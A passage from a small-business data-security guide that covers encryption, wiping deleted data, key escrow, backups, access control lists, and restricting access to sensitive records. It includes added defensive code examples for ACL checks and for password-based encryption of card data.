processing, and, because computers get cheaper with time, it makes sense to use encryption which is
stronger than you need today to make sure it cannot be broken tomorrow. Generally, the "proprietary"
encryption built into many applications (e.g. MS Word, PK-Zip) is rather weak; someone can decode the
document quickly even without your password. As with deadbolts, there are published standards for good
encryption, such as IDEA or AES-256, which are well tested.

Data Hygiene: Cleaning Previously Deleted Files

When you are moving to an encrypted file solution, whether it involves encrypting individual files
or whole folders, you need to securely delete any old copies on your hard drive. This includes any
old copies of confidential data you may have already insecurely deleted and which thieves can
readily access. How do you get rid of those? There are two decent solutions, neither of which is
very complicated.

The first involves wiping the entire drive with a security tool, reinstalling, and copying the files (now
encrypted) back. This is essentially the nuclear bomb solution which is crude and extraordinarily
effective at removing any leftover traces of just about anything, but may be too disruptive, especially
if you have a few machines to change over and people needing to get work done in the meantime.
You might still apply this solution whenever the machines are reinstalled in the normal course of
maintenance.

The second solution is not quite as effective, but is simple and a bit less destructive. Essentially, you
want to force the system to overwrite any free space on the drive, erasing leftover data. Just create
a really big file, filling most of the drive, and securely delete it. On PCs, there are tools to do this
for you: CIPHER.EXE on Windows XP and Windows Server OSes, and the Disk Utility on OS X
("Erase Free Space"). This technique does not necessarily wipe out old file names and so forth (a
concern if you use names, social security numbers, or other sensitive data in your file names) and has
mixed results on Linux/UNIX systems [GarfinkleMalan-2006].

For the truly paranoid (or the truly bound by litigious clients) this second technique can even be
used periodically as part of a data-hygiene policy.

Encrypting individual files is difficult enough that it may lead to unsafe practices if it is your only solution.
First, it is inconvenient to have to encrypt/decrypt individual documents. Second, you need to worry about
cleaning up readable (called cleartext) copies you or your office program may make while working on
them. A safer and more convenient method is to encrypt whole folders or whole drives. Tools will decrypt
the files automatically as you use them. You can use a single password, or some tools let you store a key on
a removable device you can lock up at night. You can work on multiple files at once and cleanup is easier.
Different products accomplish this in different ways with somewhat different security, convenience, and
performance tradeoffs.

Ok, if you have all of your important documents encrypted, what happens when one of your employees
is run over by a bus? How do you access all of their encrypted documents? The low-tech solution is one
I have employed many times. When working on a client's systems, I would simply print out the top level
passwords for a system (the root password) and have them put the paper in a safe. If I left their service
or was otherwise unavailable, they had access to their systems. The root password could be used to reset
any of my other passwords even if they did not know them. It is also simple to store the password to a
password file or keychain in this manner.

This works well for managing a few critical passwords that only change on a scheduled basis, but is more
difficult when more users are involved and they are encouraged to change their passwords frequently. Enter
something called key escrow. Key escrow is a process where multiple passwords can be used to access the
same data. Typically, an employee would have one password they used for their encrypted folder and an
administrator would have a master password which could access the folders of all employees. Tools which
implement key escrow, such as Windows XP's Encrypting File System or the Macintosh encrypted home
folders, are becoming common. The downside, of course, is you again have a single password which can
do great damage in the hands of an attacker.

One last consideration is data hygiene. There are a number of places that your confidential data may end
up by accident which need to be cleaned up from time to time, such as your web browser's cache files,
your operating system's virtual memory, and free space on your hard drive. Web browsers have options
to clear private data, which can be used every so often, or the browser's files can be placed in an encrypted
folder. Virtual memory (also called paging or swap) is an operating system feature where the hard drive
is used to keep the system running when you run out of real memory. Applications and data that are not
being used are moved to the slow disk drive to clear space in the fast system memory for applications that
need it. In the process, confidential data such as passwords and sensitive documents you are editing may
get saved on the disk where attackers can find it. Operating systems can be set up to encrypt virtual memory
(configurable on Windows Vista, Apple's OS X, and Linux; third-party tools on XP). Clearing hard drive free
space is discussed in Data Hygiene: Cleaning Previously Deleted Files.

Backing Up Documents
For the most part, backup and recovery is not a security concern per se and is a complex subject in its
own right. We will touch on some security-specific issues here.

Backing up documents is important to protect yourself against attackers who may want to destroy data
instead of or in addition to copying it. Many attackers will not draw attention to themselves by destroying
data on any large scale, but tampering with data, particularly financial records or log files, is a serious
issue. Regular backups will allow you to compare copies of records and detect discrepancies. Log files
in particular contain valuable forensic evidence that will help you and the authorities in investigating
a crime. Any attacker gaining access to a system will attempt to alter or destroy them. It is critical that logs
be written to a remote location, which many software and hardware tools support.

Mirroring or high availability systems (RAID) which make copies of data across several disk drives are
not backup systems for purposes of security. Mirrored hard drives are clones of each other; if an important
document is deleted or modified on one drive, it will immediately be deleted or modified on the other,
leaving no one the wiser. A backup system must take snapshots of files at a particular point in time so that
documents can be restored to some previous state when they are needed.

Backing up encrypted files can be tricky. You either need to store passwords with the backups (since they
change over time) or store the data unencrypted. In either case, the backups must be physically secure or a
thief will simply steal them instead of the computer. I have seen many cases where companies store backup
tapes unlocked right on top of the system being backed up. Not only does this make a thief's job easy,
it guarantees that a fire which destroys the computer destroys the backup as well [19]. Small, fire-resistant
media safes are convenient and inexpensive protection for small businesses.

Storing data unencrypted prevents problems when the passwords get separated from the data or if the tool
you used to encrypt them is no longer used. PCI/DSS requires that backups containing customer account
information (the PAN, or Primary Account Number, specifically) be encrypted [PciSsc-2006 § 3.4]. In
this case, you will want to deliberately store the data and passwords in separate, secure locations. Media
safes and secure offsite storage may be good options for protecting your media and both can protect from
fire, accident, and other losses.

Tip
Test your backups or they might not be there when you need them.

Oh, and test your backups occasionally. An administrator at a Canadian agency recently wiped out an
accounting system with $38 billion in accounts by accident and then found out that the backup tapes were
unreadable [Maxcer-2007]. I'll bet he's looking for work.

Network Services - Sharing and Editing Files

Between the PC and the firewall, there may be a wide range of network services, but mostly they come
down to ways to collaborate: sharing and editing files, which is where we will focus our attention.

Network Authentication
When you get past the smallest of networks and the individual PC, there has to be some way to know
whether someone belongs on the network at all. At home, I have two computers which are used by the
same people. I just create the same accounts on both computers with the same passwords. Sharing files
is not hard. The computer in the living room allows anyone on the inside network who can provide the
proper username and password to connect. Someone would be hard pressed to plug a new computer
in without my knowing.

This setup quickly becomes unworkable as the number of PCs grows. Keeping passwords and accounts
up to date across more than a handful of computers is a pain. Forgetting to remove people who should no
longer have access is dangerous. This is generally solved by some sort of network authentication system
which keeps track of the accounts and passwords, allowing one change to affect everything which needs
changing. When someone sits down at a PC, the PC checks with the network system to see if the person
is allowed access. The same thing happens when someone tries to access a shared file. It is also possible
to find out when someone plugs an unauthorized computer (e.g. a laptop) into the network. There are a
number of different ways to do this and secure it.

Regardless of your setup, an important thing to note is you need to have a defined policy for departing
employees. Just as many companies have an exit checklist to make sure employees have turned over
required paperwork, files, and keys when they leave, you should have a checklist making sure that all of
their accounts, passwords, and access rights have been terminated, and that their electronic documents
have been transferred for someone else to sort through and file. It is a simple thing which can save much
potential grief.

Systems appearing on the network can be handled a number of ways. Network services can be set up to
only communicate with known PCs. This can be done by several methods and trades some complexity
for added security. Unknown computers can be quarantined, restricted, or simply treated as guests, able to
access web sites and email for the benefit of contractors or other visitors with laptops.

19
I was once bitten myself when we brought backup tapes back onsite to restore a server after a lightning strike and data loss. At that very moment,
a pipe broke above us and flooded the computer room. The resultant electrical chaos destroyed the backup. If you use offsite storage, make a copy
to bring back onsite.

Shared Folders and Files

It is not enough for employees to be able to work on documents stored on their own PCs. They must also be
able to share documents with other employees, look up old documents, and collaborate on the production
of new documents. Once again, there are many different technologies to do this, and, to the extent possible,
we will ignore them except where it matters to security.

Whether people share files from their PCs, the files are placed in a central server, or they are stored on a
vendor's site, from a security point of view, the basic problem with sharing documents is how to let the
people that need access get it while denying access to everyone else. This is usually accomplished with
one of two basic processes.

The first is through Access Control Lists (ACLs). ACLs are sets of rules about which individuals or
groups can do specific things to a particular resource, such as add documents to a folder, or read a
sales report. The combination of individuals, groups, and different types of permissions in many systems
can be quite powerful, such as saying that everyone in Accounting has full access to a folder, except
Contractors. George (a contractor) can read documents and nothing else. Different systems provide
different protections and amounts of detail. By setting up appropriate groups and folder permissions, the
access controls on individual files may seldom need to be mucked with.
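The Accounting/Contractors/George example above, worked through in Go as an added illustration (not code from the original text). The resolution order it uses, rules naming a user beat rules naming a group and a deny beats an allow within the same level, is an assumption modelled on common file-server behaviour, not a description of any particular product; the users and groups are constructed sample data.

```go
package main

import "fmt"

// Permission is one of the CRUD actions the glossary lists for ACLs.
type Permission string

const (
	Create Permission = "create"
	Read   Permission = "read"
	Update Permission = "update"
	Delete Permission = "delete"
)

// Rule grants or denies a set of permissions to one user or one group.
type Rule struct {
	Principal string // user name or group name
	IsGroup   bool
	Allow     bool // false means this rule denies
	Perms     []Permission
}

// ACL is the list of rules attached to one resource, here a folder of sales reports.
type ACL []Rule

// Directory maps each user to the groups they belong to (constructed sample
// data; in a real network this comes from the authentication system).
type Directory map[string][]string

func (d Directory) inGroup(user, group string) bool {
	for _, g := range d[user] {
		if g == group {
			return true
		}
	}
	return false
}

func (r Rule) covers(p Permission) bool {
	for _, x := range r.Perms {
		if x == p {
			return true
		}
	}
	return false
}

// Allowed decides whether user may perform perm on the resource guarded by acl.
// Resolution order (an assumption for this example; real systems differ in detail):
//  1. rules naming the user directly beat rules naming one of their groups;
//  2. within the same level, an explicit deny beats an allow;
//  3. if no rule applies at all, access is denied (default deny).
func Allowed(acl ACL, dir Directory, user string, perm Permission) bool {
	for level := 0; level < 2; level++ { // level 0: user rules, level 1: group rules
		decided := false
		for _, r := range acl {
			if !r.covers(perm) || r.IsGroup != (level == 1) {
				continue
			}
			if r.IsGroup && !dir.inGroup(user, r.Principal) {
				continue
			}
			if !r.IsGroup && r.Principal != user {
				continue
			}
			if !r.Allow {
				return false // a matching deny at this level is final
			}
			decided = true
		}
		if decided {
			return true // at least one allow and no deny at this level
		}
	}
	return false
}

var all = []Permission{Create, Read, Update, Delete}

// SalesReportsACL encodes the example from the text: everyone in Accounting has
// full access, except Contractors; George (a contractor) may read and nothing else.
var SalesReportsACL = ACL{
	{Principal: "Accounting", IsGroup: true, Allow: true, Perms: all},
	{Principal: "Contractors", IsGroup: true, Allow: false, Perms: all},
	{Principal: "george", IsGroup: false, Allow: true, Perms: []Permission{Read}},
}

// StaffDirectory is constructed sample membership data.
var StaffDirectory = Directory{
	"alice":  {"Accounting"},
	"george": {"Accounting", "Contractors"},
	"hal":    {"Sales"},
}

func main() {
	for _, u := range []string{"alice", "george", "hal"} {
		for _, p := range all {
			fmt.Printf("%-7s %-6s -> %v\n", u, p, Allowed(SalesReportsACL, StaffDirectory, u, p))
		}
	}
}
```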

The second process is through workflows. A workflow is a sequence of steps, from start to completion,
that some document goes through as part of a business process, such as producing a proposal. Individuals
have roles in this process, such as editing, reviewing, approving, and sending the document. After the
customer receives it, it may go through another round of changes before being filed for reference in
contract negotiations. Workflow automation, typically built into Content Management Systems, shows
team members what stage the document is in, what their assigned role is, and what their assigned action
items are. At each stage, the individuals have different access rights to the document according to their
role in the project. In all likelihood, only team members (and their superiors) will have any access at all,
and some team members only late in the process.

There are often arguments about which system is better. Like most such arguments, they miss the point.
Both are good systems and have their uses. Access Control Lists are better at managing files or records
that do not change very often and do not have distinct owners, such as client histories or past proposals.
ACLs are generally centrally managed and keeping track of permissions for changing team structures
involves a lot of interaction with system administration. Workflow systems tend to be more efficient for
documents that are being created or actively worked with. Applications usually let teams or managers
assign permissions for the projects they own, so less technical support is needed.

What generally happens is that businesses end up with a file server of some type which uses folders and
ACLs and then provide another system for discussion and collaboration. Lotus Notes™ is a popular system
in many organizations, especially technical ones, for project interaction, but these days there are many
options at many price ranges.

A problem in both of these systems is that access rules are hierarchical. Administration staff can access
any document on the system, and, in workflow systems, managers generally can as well. This access is
necessary if someone is to be able to fix problems or access documents when their owner is suddenly
unavailable. Aside from issues of trust, however, a compromised master password or broken security
system lets an attacker take anything they want. In essence, this is no different from physical files in that
there is usually a master key to all offices and physical security can generally open locked cabinets and
secure areas. The difference is that, with electronic systems, an attacker can access the system locally or
remotely, and carry off (or modify) large amounts of data without arousing suspicion. We will talk about
some solutions to this problem as we go.

Encrypting Shared Documents


Encrypting shared documents is one way to get around the untrusted computer problem. A document can
be encrypted with a password and the password given out to the people that need to access the document.
Then, even if someone gains control of the computer where the document is stored, they will not be able
to read it. Doing this systematically means that you can store sensitive documents on untrusted sites where
the administration is outsourced, such as a shared web hosting provider.

As a rule, sharing a single password, such as by encrypting a Word document and emailing it to everyone,
is a bad idea. If a password is potentially compromised, everyone's password has to be changed, and
distributing the new password (safely) is difficult. Two technologies make this easier.

The first is called Public Key Cryptography, which we will talk about in detail in a later section.
In this system everyone has a key or certificate that belongs to just them. They use this key to encrypt
and decrypt files.

The second is key escrow. We talked about key escrow in the section called “Protecting Documents”. In
theory, one file can be encrypted so that any number of people's keys will unlock it. A document author
can simply select names from an addressbook or company directory, encrypt the document, and store it
in a shared folder. If necessary, the list of people able to read the file can be changed. Again, as long as
all of the encryption/decryption is done locally, the remote server does not have to be trustworthy because
even someone with administrative control cannot read the file.

In practice, group-level encryption becomes messy and unsafe when the number of people needing access
is large, when ownership of documents changes over time, or group membership changes. In these cases,
either the owner ends up being a gatekeeper (“Can you give me access to ...?”), or there is a push for a more
central management of access rights. In the first case, we have the owner disbursing new encryption keys
or special copies of the document on a regular basis, at which point, why outsource document handling?
In the second case, we end up in another “One Ring to rule them all” situation, which is precisely what
we were trying to avoid [LioyEtAl-1997].

As usual, we end up making trade-offs. For archival information where the number of people needing
access is relatively large, specified by groups whose members change, and centrally administered, it
makes more sense to use centrally-managed encryption, despite the security implications. Where more
protection is needed, other solutions, such as restricting physical access, may be necessary. For workflow-
like situations, where a document is actively worked by a small team, individually managed encryption is
more feasible, and often, since the data is current, the documents may be more sensitive.

In situations where data is accessed by automated systems (an online storefront accessing stored credit
card information, for instance), applying encryption effectively is very difficult. It is not practical to have
an employee sitting there entering a password every time a customer checks out and needs to use the same
credit card they did last time. The storefront needs to be able to access the customer data without any
intervention. If the credit card information is encrypted, the application must be able to decrypt it, and,
therefore, anyone gaining control of the application can read the records no matter what security is in place.
Security is only as strong as the weakest point in the perimeter.

A handy solution to this dilemma is to use the customer's password to encrypt the data. The customer has
to give you their password to check out, anyway, so their experience is not changed. An attacker gaining
control of the system has no way of knowing what the customer's password is (there are ways to check a
password without actually storing it anywhere; trust me on this [20]), so they cannot read the information.
They might be able to copy small amounts of data over time (as customers log in and check out), but you
have made their job much harder.
20
For the overly curious, one way is to apply a math operation to it (a hash) and store the result. When they give you their password next time, see
if you get the same result. Another way is to use their password to encrypt something. If they can read it, they have the right password.

The interesting side-effect is that no one can read the customer's card information without the customer's
password. That includes your own employees if they get any bright ideas on selling stolen credit card
numbers. Once the purchase is completed, the card information is locked away. It also means that the
customer himself or herself cannot access the card information if the password is forgotten. In this case,
delete the information, and have them enter their credit card number again the next time they purchase.
Make sure you encrypt only what you need to, minimizing inconvenience, and take the opportunity to
explain how you are protecting them from identity theft.
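The customer-password scheme above and footnote 20's stored-hash check, as an added Go example that is not from the original text: a per-customer random salt, a PBKDF2-stretched password, an encryption key that is never stored and a separate stored verifier, and AES-GCM for the card number. The function names, iteration count and sample card number are constructed for this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"errors"
)

// pbkdf2HmacSha256 is PBKDF2 (RFC 8018) with HMAC-SHA256, written out here so
// the example needs only the Go standard library.
func pbkdf2HmacSha256(password, salt []byte, iter, keyLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var dk []byte
	for block := 1; len(dk) < keyLen; block++ {
		prf.Reset()
		prf.Write(salt)
		prf.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:keyLen]
}

// kdfIterations is a constructed value; raise it as far as checkout latency allows.
const kdfIterations = 20000

// CardRecord is what the storefront database keeps per customer. Without the
// customer's password, neither the card number nor the password can be read from it.
type CardRecord struct {
	Salt, Verifier, Nonce, Ciphertext []byte
}

// ErrWrongPassword also covers a forgotten password: delete the record and ask again.
var ErrWrongPassword = errors.New("wrong password")

// deriveKeys stretches the password into two independent 32-byte values: an
// encryption key that is never stored, and a verifier that is stored (footnote
// 20's "apply a math operation to it and store the result").
func deriveKeys(password string, salt []byte) (encKey, verifier []byte) {
	dk := pbkdf2HmacSha256([]byte(password), salt, kdfIterations, 64)
	return dk[:32], dk[32:]
}

func gcmFor(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// SealCard encrypts the card's Primary Account Number under the customer's
// password; GCM also authenticates the ciphertext, so tampering is detected on open.
func SealCard(password, pan string) (*CardRecord, error) {
	salt := make([]byte, 16)
	if _, err := rand.Read(salt); err != nil {
		return nil, err
	}
	encKey, verifier := deriveKeys(password, salt)
	gcm, err := gcmFor(encKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return &CardRecord{salt, verifier, nonce, gcm.Seal(nil, nonce, []byte(pan), nil)}, nil
}

// OpenCard checks the password against the stored verifier in constant time and,
// only if it matches, decrypts the card number. The password itself is never stored.
func OpenCard(rec *CardRecord, password string) (string, error) {
	encKey, verifier := deriveKeys(password, rec.Salt)
	if subtle.ConstantTimeCompare(verifier, rec.Verifier) != 1 {
		return "", ErrWrongPassword
	}
	gcm, err := gcmFor(encKey)
	if err != nil {
		return "", err
	}
	pan, err := gcm.Open(nil, rec.Nonce, rec.Ciphertext, nil)
	if err != nil {
		return "", err // record was tampered with
	}
	return string(pan), nil
}
```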

Restricting Network or Physical Access


Another way to protect sensitive shared documents is to restrict where they can be accessed. We already
mentioned the possibility of splitting documents based on sensitivity, with some residing inside and some
outside the firewall, in the section called “The Back Door - Employees On the Go”. Here, we examine
some other ways to restrict access.

If you have an online storefront and a database of customer information, you can put the customer
database on its own computer and severely restrict access to that computer (in fact, PCI/DSS requires
this [PciSsc-2006 § 1.3.4, § 9.1, etc.]). In particular, it is possible to put the database on its own network
section, have it only respond to specific connections from your online storefront and internal order tracking
system (to which it is directly wired) and only allow administration from its own keyboard (presumably in
a locked room). If it must be remotely administered (remote emergency management), force connections
to come through a specific administrator workstation so that someone must go through multiple, logged,
levels of security to gain access, and even then, they do not need to be able to see customer data to fix
a software outage.

In this way, an attacker is hemmed in. A remote breach of the storefront can only do things the store
is normally allowed to do, such as accessing customer records one at a time with a password, rather
than copying them all at once, and there is seldom a reason to display a whole account number back
to a customer. Inside attacks are similarly blunted: internal order processing doesn't need to see whole
customer card information (once it has been sent through the card processing system and confirmed), and
an employee would need physical access to get anything more (Smile for the camera!). A determined and
resourceful attacker can still do damage, but it will take serious work, your pool of suspects will be smaller,
and your evidence will be of higher quality.

Other sensitive documents can also be physically restricted. At the Pentagon, the classified information
was on a completely separate network; there were no physical connections to the Unclassified network
and someone had to physically sit at a Classified computer to access restricted data. Moving information
from one system to the other (by disk) required going through the responsible officer who had to examine
the data and the disk. Moving data without permission was severely disciplined.

Perhaps you do not handle information which can determine the fate of countries, but you may very well
have documents that can sink your business if improperly used. It may be worth asking yourself: do I really
need this available outside the office? Can the people on the team come here to work on this document?
Do I really want to face liability if this walks out the door? The best network defense is sometimes a pair
of scissors: clip the network cable.

If you do have restricted machines, you will need to get some information in and out (like reference sources
in and completed documents out), but will need control over it. UNIX/Linux based systems are particularly
good at controlling access to external disks and devices. You can specify exactly who may do what with
CDs or the ubiquitous USB drives. This is a much less messy solution than gluing USB ports shut (which
companies have done). You can assign one or more gatekeepers to make copies of documents when people
need them.

Of course, all of this is a lot of work, may be expensive, and is in direct opposition to recent trends in
telecommuting. Particularly as gas prices reach record highs, employees have a tremendous incentive to
work at home. We also work in markets that are increasingly globalized; it is not always practical to bring
people to the same location to work on a document. As usual, what you choose depends on the value of
your data, the risks of its exposure, and the business opportunities you want to take advantage of. No one
can make that choice for you, and, in the end, there may be no perfect answer.

Internet Services and Communication


In order to function, employees need to be able to communicate with the outside world and use services
from other businesses. Increasingly, these services and communications are provided by the Internet.

Restricting Use
Even when employees are allowed to access documents, you may want to restrict what they can do with them.
Access controls and encryption do not seem to be worth much when an employee can put an unprotected
copy on a disk and take it home, or forward a sensitive email. Once you send a document to a client or
vendor, none of your network protections come into play.

The solution to this dilemma, or so many vendors claim, is a technology called Digital Rights Management
or DRM.

Conclusions
Frustrations
Inevitably, as your data security plan progresses, you will encounter frustrations once you leave the safety
of your own network. Implementing a policy of secure email and document encryption will only get you
so far when the companies you communicate with do not use them. Protecting your confidential data
may seem hopeless when the vendors and agencies you must entrust it to in the course of business are
compromised on a regular basis.

This difficulty is one of the reasons there is so much quality free security software available. Many
individuals, companies, and agencies have realized that increased use of these technologies benefits them
and have donated time and money to making them widely available. For the most part, however, use
of protective technologies for Internet communication to prevent forgeries, tampering, and disclosure is
rare, even though the technology has been widely available for more than a decade. This is mostly due to
consumer ignorance of how Internet criminals operate and how technology can work against them. The
fact that law enforcement has tried to associate the use of encryption with criminals and terrorists does
not help the situation.

In reality, the use of technologies to prevent forgery alone can make a large difference in Internet
communication. Spam can be sent without forging emails, but the ability to forge sender addresses makes
it much harder to stop. If spammers had to use legitimate domains and servers to send their mail, zombie
botnets would be less useful and domains which sent spam could be blacklisted from mail servers.
Without the ability to easily forge emails, email phishing schemes would virtually disappear. Initiatives
like the Sender Policy Framework [21] for identifying which computers are allowed to send email for an
Internet domain, and personal solutions like digitally signing email, allow the receiver of an email to have
greater confidence that what they receive is legitimate. We have SSL and digital certificates to tell us that
the website we are entering our credit card information into is who we think it is, but people commonly
open attachments in emails that claim to be from friends or colleagues with no real way to know where
they came from.

As for encryption in emails, regulations, confidentiality agreements, or self-preservation may lead you to
protect data in transit. We do not write financial data on the outside of a postcard and stick it in a mailbox.
Yet, encryption does not help if the receiver cannot read it. It can be difficult to convince a business partner
to adopt a security practice in order to work with you. Do not count out the low-tech solutions. In some
cases, old-fashioned mail or personal service may be the safer option.

21
http://www.openspf.org/

Compromises in vendor and agency security present a difficult problem. Selecting trustworthy vendors,
considering the widespread nature of the problems, requires something akin to psychic powers. Even if
that could be done consistently, you cannot refuse to provide data to government agencies. Two techniques
can be of help. One is using unique data with each vendor. Some banks allow the creation of one-time
credit card numbers which can be used for a single transaction. It is also possible to use a unique email
address for each vendor you work with. Watching where this unique data turns up tells you who is selling
or exposing your private data and the facts may surprise you. Another good technique is making sure you
have confidentiality agreements protecting important data and relationships. Boilerplate text may do in
many cases. It may make another organization think more seriously about your documents, and, at the
very least, it gives you a basis for a legal action if your data is stolen.

As a whole, the solution will require outreach, activism, lawsuits, and time. Consumers need to know
the nature of the problems they face and that they have choices for protecting themselves. Until public
policy and caselaw make entities responsible for data leaks and for illegal use of their equipment, many
businesses will not take action. At present, for instance, merchants who are the victims of credit card fraud
pay the brunt of costs and fees, leaving those who actually lose the data little incentive to improve. Over
time, standard practices will develop and caselaw will begin to take those practices as a matter of course.
In the meantime, tenacity and creativity will have to do.

Glossary
Access Control Lists A list of individuals or groups allowed to access a particular resource
in a specific way, for instance, write to a document, or delete
documents in a folder. Common controlled actions are Create, Read,
Update, and Delete, or CRUD. ACLs can usually include basic rules,
such that, for instance, all members of Accounting can access a
document, except Contractors. ACLs are usually centrally managed;
teams are limited in their ability to manage document access rights.
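The kind of rule the entry describes ("all members of Accounting can access a document, except Contractors"), as an added example that is not code from the article: a small ACL evaluator over the four CRUD actions. The user, group and document names are constructed, and the evaluation order (an explicit deny beats any allow, and nothing matching means no access) is an assumption that mirrors how most file systems and directory services resolve conflicting entries.

```python
"""Minimal access-control-list (ACL) evaluator.

Added example; not from the original document. Group names, user
names and resource names below are constructed for illustration.
"""
from dataclasses import dataclass, field

# The four CRUD actions the glossary entry mentions.
ACTIONS = {"create", "read", "update", "delete"}


@dataclass
class AclEntry:
    """One rule: allow or deny a set of actions to a principal.

    principal is a user name or a group name; deny entries exist so that
    a rule like "all of Accounting except Contractors" can be expressed.
    """
    principal: str
    actions: set
    allow: bool = True


@dataclass
class Acl:
    entries: list = field(default_factory=list)

    def is_allowed(self, user, groups, action):
        """Return True if `user` (a member of `groups`) may perform `action`.

        Evaluation rule (a common convention, assumed here): an explicit
        deny matching the user or any of their groups wins over any allow;
        otherwise any matching allow grants access; otherwise default deny.
        """
        if action not in ACTIONS:
            raise ValueError(f"unknown action: {action}")
        principals = {user} | set(groups)
        matching = [e for e in self.entries
                    if e.principal in principals and action in e.actions]
        if any(not e.allow for e in matching):
            return False
        return any(e.allow for e in matching)


def build_example_acl():
    """ACL for a payroll document (constructed example)."""
    return Acl([
        AclEntry("Accounting", {"read", "update"}),
        AclEntry("Contractors", {"read", "update", "delete"}, allow=False),
        AclEntry("payroll-admin", ACTIONS),   # one named user gets everything
    ])


def check(acl, user, groups, action):
    """Convenience wrapper so the decision is a plain function call."""
    return acl.is_allowed(user, groups, action)


if __name__ == "__main__":
    acl = build_example_acl()
    print(check(acl, "alice", ["Accounting"], "read"))               # True
    print(check(acl, "bob", ["Accounting", "Contractors"], "read"))  # False
    print(check(acl, "payroll-admin", [], "delete"))                 # True
    print(check(acl, "carol", ["Sales"], "read"))                    # False
```

Because the default is deny, a user who appears in no entry gets nothing, and because deny entries win, adding someone to Contractors removes access even if they remain in Accounting; that is the property a centrally managed ACL relies on.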

Airport™ An Apple trademark that is commonly used to refer to wireless networking or WiFi (technically the 802.11x networking standards).

bluetooth® A short-range radio technology for connecting to computer peripherals, such as mice, keyboards, PDAs, cellphones, and headsets. Like wireless networking, bluetooth can be hijacked if left on or used in public places, although its short range makes attacks more difficult.

botnet A collective of remotely controlled, infected PCs (zombies) that are controlled as a unit. A botnet can consist of thousands or tens of thousands of PCs and can carry out coordinated Distributed Denial-of-Service (DDoS) attacks against a single target. Botnets can also be hired out to collect information, send SPAM or conduct other illegal activities.

COBIT® Control Objectives for Information and related Technology or COBIT® is a set of best practices for information management created by the Information Systems Audit and Control Association (ISACA)22, and the IT Governance Institute (ITGI)23, initially published in 1992. Version 4.1 will be published in May of 2007. The current version is 4.0 [Itgi-2005]. COBIT® is a standard for overall management and control of information technology in a business, including risk management, cost and quality control, and our present interest, security.

COBIT provides a specific section in its standard to deal with information security policy which is tied into the overall IT process [Itgi-2005 pp 119-122], although other sections, such as providing continuous service, are certainly relevant. An additional document, the COBIT® Security Baseline, is divided into 39 essential steps for securing the business [AliPabrai-2005, Itgi-2004] which add detailed guidance to the COBIT base standard. These steps concentrate on process and procedure more than specific technology, allowing a business to choose (and document!) techniques which best fit their needs.

CSIRT An acronym for Computer Security Incident Response Team, sometimes referred to as an Incident Response Team or Computer Emergency Response Team (CERT). A CSIRT is the group of Security, IT, Legal, Public Relations, and Management personnel that are involved or can be involved in responding to a security incident. An Incident Response Plan should lay out the responsibilities of the members of a CSIRT and the situations in which they are called in or must be informed of an incident.

de-facto standard A practice or technology which is in common use and has become a pseudo-standard, although it has no official design, definition, or consensus. One of the most frequently cited examples of a de-facto standard is the Microsoft Word™ file format. Word .doc files are used everywhere for exchange of documents, but there is no written specification for what the inside of the document looks like and, in fact, the format has changed several times over the years, leading to data exchange problems. De-facto standards lock customers into a single vendor and product line since competitors cannot (are not allowed to) provide compatible products24. The Open Document Format, by contrast, a recent ISO standard, is a simple, concise standard approved by a consortium of companies and supported by multiple products.

Underspecified document formats can have real security impacts. While I was working at the Pentagon, an officer moved a Word document containing unclassified data from the classified network to the unclassified network (which are physically separated) by a floppy disk. Unknown to him, Word documents (at the time) scooped up random information from the hard drive when they were created, and his file contained classified information hidden in the document but visible to someone who knew how to look at the raw data. When this was discovered, security personnel had to scrub a number of computers which had come into contact with the classified data. The peer review process which leads to a public standard is designed to eliminate design flaws of that nature or at least make them known to potential users with special needs.

De-facto standards have the advantage of being driven by a single developer and coherent point of view rather than being designed by a committee. This is a particular advantage with developing completely new technologies. Sometimes, these products become real published standards at a later date, such as UNIX™ and Adobe PDF™. This can lead to a best-of-both-worlds situation where a well designed and market-tested product is maintained and slowly extended by a standards body.

defense in depth A defense which consists of multiple integrated layers where the strength of the whole is greater than the sum of its parts. Attempts to exploit some weaknesses may be prevented or limited by other defenses. A single-layer defense, by contrast, even when strong, can often be bypassed completely when the defenders make a single mistake. Elements of a data security defense in depth include keeping attackers out of your network, denying them access to your PCs even if they are on the network, and encrypting sensitive documents so that they are useless even if they are stolen.

Denial-of-Service An attack which causes some service to stop functioning rather than attempting to take control of it. A Denial-of-Service attack on a website, for instance, would make it unusable or slow for legitimate customers. Vulnerabilities leading to DoS tend to be more frequent and easier to exploit than those which allow actually taking control of a computer, though they are of less use to the attacker.

A Distributed Denial-of-Service (DDoS) is a coordinated attack by many computers at once against a single target. DDoS usually involves a collection of zombies (or botnet) and is done for purposes of ideology, revenge, or extortion. The fact that the attacks come from many distinct, innocent sources makes them difficult to counter. The individual contribution of one infected PC is small and may not be detected by the owner's Internet Service Provider, but the combined effect is devastating, and sustained attacks can bankrupt businesses with bandwidth charges and lost revenue.

DMZ A small network provided by a firewall for Internet services, such as web and mail servers, to reside. These servers must be exposed to the Internet so that customers may access them, but should have at least limited protection. The DMZ is more dangerous than the inside of the firewall, so more effort needs to be taken to make sure the servers are secure. Consumer grade firewalls often limit the DMZ to a single PC, called the DMZ host, which has minimal or no protection.

DMZ stands for Demilitarized Zone, although the full name is never used. It refers to the land-mined no-man's land between North and South Korea and underlines the fact that it is a dangerous space between the internal network and the hostile Internet.

DRM A technology which aims to restrict the particular uses a file, document, or media item may be used for. For example, it may be used to restrict viewing to certain computers or certain people, prevent copying, forbid editing, cause documents to expire, or track usage.

Its flaw is that, in order for legitimate users to access a document, the document must contain the information necessary to read it (by definition). DRM relies on security by obscurity and on restricting content viewing and editing to specific applications which know the secret handshake for unlocking the document. The application then reads and enforces restrictions encoded in the document. DRM functions well if-and-only-if the secret is not known. Once that secret is revealed, all protected documents are compromised.

